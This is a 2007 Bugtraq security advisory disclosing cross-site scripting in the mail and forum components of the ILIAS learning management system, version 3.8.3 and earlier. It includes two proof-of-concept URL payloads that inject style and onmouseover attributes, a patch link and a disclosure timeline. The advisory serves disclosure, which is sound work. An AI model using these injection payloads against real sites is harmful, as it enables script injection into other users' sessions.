ILIAS <= 3.8.3 Cross Site Scripting

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: ILIAS <= 3.8.3 Cross Site Scripting
From: L4teral <l4teral@xxxxxxxxx>
Date: Tue, 30 Oct 2007 22:14:33 +0100
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; bh=40My3HzxnJZyNWDzRfgJUis4FBWpw9wkeK9fpw04NrA=; b=JPZ7s3vwHyI6IQomvmprcU+RoOBNB8i9di2mddmgDKrTP1tKVJhEroGIU7JA5mlTQb5h7SMF6zIyog4C7BQebnKfSCWgaS7eokpuvHSDX0u6GNdZ2yUwY/Ow404z3EqJyr2ejxfSnOdGDy0d28LeSmdzX2AsRoAaOtvHiBogHFU=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=QzQhVZE081VW0n2VJUeSc5jkSnjICPJYqOSESG6FZdSEKnr4KkOie0ODTUfbjvSzAw1/zSHIOXI+zhZFsnoRIEJFhV91TOHh6zE1BURV1hOukUdbS33ZXaZHk271/oQff5+xysa8DGRJwqFE0dfY/N7R9xaERTMpp6K7gfbapV4=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

======================================================================
ILIAS <= 3.8.3 Cross Site Scripting
======================================================================

Author:          L4teral <l4teral [4t] gmail com>
Impact:          Cross Site Scripting
Status:          patch available


------------------------------
Affected software description:
------------------------------

Application:     ILIAS
Version:         <= 3.8.3
Vendor:          http://www.ilias.de

Description:
ILIAS is a powerful web-based learning management system that allows
you to easily manage learning resources in an integrated system.


--------------
Vulnerability:
--------------

The mailing and forum components are vulnerable to cross site scripting.


------------
PoC/Exploit:
------------

create forum post/mail with:
http://www.ex"style="width:expression(alert('xss'))"ample.com

http://www.ex"onmouseover="javascript:alert('xss');"ample.com


---------
Solution:
---------

install security patch:
http://www.ilias.de/docu/goto.php?target=pg_16836_35&client_id=docu


---------
Timeline:
---------

17.10.2007 - vendor informed
25.10.2007 - vendor responded
29.10.2007 - vendor released patch
30.10.2007 - public disclosure

Prev by Date: [ GLSA 200710-31 ] Opera: Multiple vulnerabilities
Next by Date: [ GLSA 200710-30 ] OpenSSL: Remote execution of arbitrary code
Previous by thread: [ GLSA 200710-31 ] Opera: Multiple vulnerabilities
Next by thread: [ GLSA 200710-30 ] OpenSSL: Remote execution of arbitrary code
Index(es):
- Date
- Thread